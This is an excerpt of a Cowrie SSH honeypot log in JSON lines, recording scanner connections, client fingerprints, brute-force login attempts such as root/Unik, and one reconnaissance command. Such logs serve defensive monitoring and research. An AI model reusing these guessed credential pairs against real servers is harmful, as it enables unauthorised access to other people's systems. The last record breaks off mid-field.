{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:37.709070Z","src_ip":"212.227.235.229","session":"469b90b4956c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:37.844503Z","src_ip":"212.227.125.160","session":"6592d37e9fb2"}
{"eventid":"cowrie.login.success","username":"root","password":"Unik","message":"login attempt [root/Unik] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:43:39.006723Z","src_ip":"212.227.125.160","session":"b284ac8be864"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58320,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b04a358f8dd","protocol":"ssh","message":"New connection: 212.227.235.229:58320 (1.2.3.4:22) [session: 2b04a358f8dd]","sensor":"my-vps","timestamp":"2025-08-31T04:43:40.102650Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:43:40.907558Z","src_ip":"212.227.125.160","session":"b284ac8be864"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T04:43:40.908364Z","src_ip":"212.227.125.160","session":"b284ac8be864"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:42.455379Z","src_ip":"212.227.125.160","session":"b284ac8be864"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:42.456494Z","src_ip":"212.227.125.160","session":"b284ac8be864"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:43.936550Z","src_ip":"212.227.235.229","session":"2b04a358f8dd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:43.937291Z","src_ip":"212.227.235.229","session":"2b04a358f8dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50484,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c023c99c9cf","protocol":"ssh","message":"New connection: 212.227.235.229:50484 (1.2.3.4:22) [session: 7c023c99c9cf]","sensor":"my-vps","timestamp":"2025-08-31T04:43:44.242250Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52800,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1bc7ffdecfc","protocol":"ssh","message":"New connection: 212.227.235.229:52800 (1.2.3.4:22) [session: f1bc7ffdecfc]","sensor":"my-vps","timestamp":"2025-08-31T04:43:50.029671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:43:50.030341Z","src_ip":"212.227.235.229","session":"f1bc7ffdecfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49602,"dst_ip":"1.2.3.4","dst_port":22,"session":"5892ec9b589d","protocol":"ssh","message":"New connection: 212.227.235.229:49602 (1.2.3.4:22) [session: 5892ec9b589d]","sensor":"my-vps","timestamp":"2025-08-31T04:43:50.118282Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:43:50.156710Z","src_ip":"212.227.235.229","session":"f1bc7ffdecfc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:50.233150Z","src_ip":"212.227.235.229","session":"5892ec9b589d"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":38078,"dst_ip":"1.2.3.4","dst_port":22,"session":"70bf5e24e6b5","protocol":"ssh","message":"New connection: 201.148.180.50:38078 (1.2.3.4:22) [session: 70bf5e24e6b5]","sensor":"my-vps","timestamp":"2025-08-31T04:43:50.372556Z"}
{"eventid":"cowrie.login.failed","username":"tempusr","password":"123qwe!@#QWE","message":"login attempt [tempusr/123qwe!@#QWE] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:50.701466Z","src_ip":"212.227.235.229","session":"f1bc7ffdecfc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:51.516792Z","src_ip":"201.148.180.50","session":"70bf5e24e6b5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:43:51.517460Z","src_ip":"201.148.180.50","session":"70bf5e24e6b5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:51.828170Z","src_ip":"212.227.235.229","session":"f1bc7ffdecfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54426,"dst_ip":"1.2.3.4","dst_port":22,"session":"37dbc3e4fecb","protocol":"ssh","message":"New connection: 212.227.125.160:54426 (1.2.3.4:22) [session: 37dbc3e4fecb]","sensor":"my-vps","timestamp":"2025-08-31T04:43:51.874055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:51.875000Z","src_ip":"212.227.125.160","session":"37dbc3e4fecb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49634,"dst_ip":"1.2.3.4","dst_port":22,"session":"05e77924b108","protocol":"ssh","message":"New connection: 212.227.235.229:49634 (1.2.3.4:22) [session: 05e77924b108]","sensor":"my-vps","timestamp":"2025-08-31T04:43:51.967807Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:43:52.064484Z","src_ip":"212.227.125.160","session":"37dbc3e4fecb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:52.125523Z","src_ip":"212.227.235.229","session":"05e77924b108"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:52.269274Z","src_ip":"212.227.235.229","session":"05e77924b108"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52190,"dst_ip":"1.2.3.4","dst_port":22,"session":"c65817e6df74","protocol":"ssh","message":"New connection: 212.227.235.229:52190 (1.2.3.4:22) [session: c65817e6df74]","sensor":"my-vps","timestamp":"2025-08-31T04:43:52.342233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:52.468044Z","src_ip":"212.227.235.229","session":"c65817e6df74"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:52.618313Z","src_ip":"212.227.235.229","session":"c65817e6df74"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:52.632241Z","src_ip":"212.227.125.160","session":"37dbc3e4fecb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-